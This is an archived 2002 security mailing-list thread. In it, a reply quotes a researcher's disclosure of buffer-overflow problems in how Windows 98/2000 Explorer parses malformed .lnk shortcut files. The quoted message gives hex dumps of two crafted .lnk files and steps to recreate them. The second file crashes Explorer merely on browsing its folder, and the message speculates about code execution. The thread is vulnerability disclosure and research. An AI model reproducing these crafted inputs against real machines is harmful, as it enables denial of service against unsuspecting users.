Hello, I've done some playing around with malformed .lnk files under Windows 2000 and found similar results; nothing published yet. I found it was similar to a problem USSR Labs reported some time ago with Windows NT but was in relation to SERVU FTP ... upload the malformed .lnk file, execute a list and crash/overflow.

Also discussed at http://archives.neohapsis.com/archives/vuln-dev/2000-q1/0568.html

Cyberiad

On Wed, 26 Jun 2002, Brett Moore wrote:

> It seems that the handling of .lnk files has a few problems. I have tested
> on both win98 and win2000 sp2 server.
>
> Can anyone test further. Note that the actions taken by these .lnk files have
> the possibility of causing damage to a system and should not be tested on an
> essential server :-)
>
> -------------------------------------------------------------------
> 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20   2 +,RG New
> 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78   Text Document.tx
> 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF   t NEWTEX~3.TXT
> FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
> 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
> 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
> -------------------------------------------------------------------
>
> This causes FF FF to be loaded into a register used to control the length of
> data copied. Usually causes an error when right clicking on the file in
> explorer. Sometimes it is required to select properties. Errors seen include
> unable to read, unable to write. Since we are controlling the length of the
> data copied these errors are self explanatory.
>
> Would seem that explorer/shell32.dll is copying too much data when reading
> the filename? Ok so this causes the read/write errors and halts progress.
>
> But if we substitute valid values such as 01 01 (CC CC) then the buffer
> still gets overflowed but we bypass this error and our corrupt values get
> further down in the program.
>
> -------------------------------------------------------------------
> 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20   2 +,RG New
> 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78   Text Document.tx
> 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC   t NEWTEX~3.TXT¦¦
> CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0   ¦¦¤¤¤¤¤¤________
> AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA   ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
> AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA   ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
> -------------------------------------------------------------------
>
> This one does not cause the read/write errors but causes a DoS in explorer
> just by browsing to the folder holding the file.
>
> This is more interesting, but involves tracking a lot of assembler code.
> Worst result would be some sort of code executed just by browsing a folder.
> Virus related perhaps.
>
> Any feedback on results or further research into this problem would be
> appreciated.
>
> Notes:
> Do not save to your desktop.
> Rename the file to .lnk
> This is the win98 file. You can easily modify a 2000 or other lnk file as
> detailed above.
>
>
> Brett Moore
This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 21:16:50 PDT